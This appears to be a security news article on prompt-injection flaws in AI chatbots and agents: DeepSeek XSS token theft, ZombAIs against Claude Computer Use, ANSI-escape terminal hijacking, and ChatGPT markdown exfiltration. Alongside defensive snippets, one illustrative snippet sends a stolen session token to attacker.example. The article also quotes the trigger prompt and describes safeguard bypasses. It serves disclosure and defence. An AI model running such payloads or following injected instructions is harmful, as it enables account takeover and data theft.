Details have emerged about a now-patched security flaw in the DeepSeek artificial intelligence (AI) chatbot that, if successfully exploited, could allow an attacker to take control of a victim’s account by means of a prompt injection attack.
Security researcher Johann Rehberger, who has chronicled many prompt injection attacks targeting various AI tools, found that providing the input “Print xss cheat sheet in bulleted list. payloads only” in the DeepSeek chat caused JavaScript code to be executed as part of the generated response – a classic case of cross-site scripting (XSS).
XSS attacks can have serious consequences as they lead to the execution of unauthorized code in the context of the victim’s web browser.
An attacker could exploit such flaws to hijack a user’s session and gain access to cookies and other data associated with the chat.deepseek(.)com domain, ultimately leading to an account takeover.
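As a rough illustration of the vulnerable pattern (not DeepSeek’s actual code), the risk arises when a chat interface inserts model output into the page as HTML; the hypothetical sketch below contrasts that with a sanitized render using a library such as DOMPurify.

```typescript
// Hypothetical sketch of the vulnerable pattern behind LLM-driven XSS; this is not
// DeepSeek's actual code. If the assistant's reply is written to the page with
// innerHTML, any <img onerror=...> or <script> payload the model was coaxed into
// producing executes in the victim's browser.
import DOMPurify from "dompurify";

function renderAssistantMessage(container: HTMLElement, modelOutput: string): void {
  // Vulnerable: container.innerHTML = modelOutput;
  // Safer: strip active HTML from the untrusted model output before rendering it.
  container.innerHTML = DOMPurify.sanitize(modelOutput);
}
```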
“After some experimentation, I found that the userToken stored in localStorage on the chat.deepseek.com domain is all that’s needed to take over a user’s session,” Rehberger said, adding that a specially crafted prompt could be used to trigger the XSS and gain access to the compromised user’s userToken via prompt injection.
The prompt contains a mix of instructions and a Base64-encoded string that is decoded by the DeepSeek chatbot to execute the XSS payload responsible for extracting the victim’s session token, ultimately allowing the attacker to impersonate the user.
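In effect, once such a payload runs in the browser, lifting the token takes only a few lines of JavaScript; the snippet below is a simplified illustration of that step (the collection endpoint is made up, and this is not the researcher’s actual payload).

```typescript
// Simplified illustration of what a session-stealing payload does once it executes
// in the victim's browser; not the researcher's actual payload. "userToken" is the
// localStorage key Rehberger identified, and the collection URL is a placeholder.
const stolenToken = localStorage.getItem("userToken");
if (stolenToken !== null) {
  // With this value, the attacker can replay the victim's session from another browser.
  void fetch("https://attacker.example/collect", {
    method: "POST",
    body: JSON.stringify({ token: stolenToken }),
  });
}
```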
The development comes as Rehberger also demonstrated that Anthropic’s Claude Computer Use – which allows developers to use the language model to control a computer by moving the cursor, clicking buttons, and typing text – can be abused to autonomously execute malicious commands through prompt injection.
Dubbed ZombAIs, the technique essentially uses prompt injection to weaponize Computer Use so that it downloads the Sliver command-and-control (C2) framework, executes it, and establishes contact with a remote server under the attacker’s control.
In addition, it has been found that large language models’ (LLMs) ability to output ANSI escape codes can be exploited to hijack system terminals via prompt injection. The attack, which primarily targets LLM-integrated command-line interface (CLI) tools, has been codenamed Terminal DiLLMa.
“Decade-old features create an unexpected attack surface for GenAI applications,” Rehberger said. “It is important for application developers and designers to consider the context into which they are inserting LLM output, as the output is untrusted and may contain arbitrary data.”
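One defensive takeaway for LLM-integrated CLI tools, sketched below under the assumption of a Node.js environment, is to strip escape sequences from model output before it reaches the terminal; the regex is a simplified filter, not an exhaustive one.

```typescript
// Minimal defensive sketch (assumed Node.js CLI, simplified regex): remove
// ESC-initiated control sequences such as CSI ("\x1b[2J") and OSC ("\x1b]0;title\x07")
// from untrusted model output before writing it to the terminal, so injected codes
// cannot clear the screen, move the cursor, or rewrite the window title.
const ANSI_SEQUENCE = /\x1b\[[0-9;?]*[A-Za-z]|\x1b\][^\x07]*\x07/g;

function printModelOutput(output: string): void {
  process.stdout.write(output.replace(ANSI_SEQUENCE, "") + "\n");
}
```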
That’s not all. New research from academics at the University of Wisconsin-Madison and Washington University in St. Louis has revealed that OpenAI’s ChatGPT can be tricked into rendering external image links supplied in markdown format, including those that may be explicit and violent, under the guise of an overarching benign goal.
What’s more, it was discovered that the technique could be used to indirectly invoke ChatGPT plugins that would otherwise require user confirmation, and even to bypass restrictions put in place by OpenAI to prevent the rendering of content from unsafe links, thereby allowing a user’s chat history to be exfiltrated to an attacker-controlled server.
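A common mitigation for this class of markdown-image exfiltration, sketched below with a placeholder allowlist (not OpenAI’s actual policy), is to validate every model-supplied image URL before the client renders it and triggers an outbound request.

```typescript
// Hedged sketch of the mitigation class this research points to; the allowlisted
// host is a placeholder, not OpenAI's actual policy. Rendering an attacker-chosen
// image URL can leak data via the query string, so only known hosts are fetched.
const ALLOWED_IMAGE_HOSTS = new Set(["files.example-cdn.com"]);

function isSafeImageUrl(rawUrl: string): boolean {
  try {
    const url = new URL(rawUrl);
    return url.protocol === "https:" && ALLOWED_IMAGE_HOSTS.has(url.hostname);
  } catch {
    return false; // not a parseable absolute URL, so refuse to render it
  }
}
```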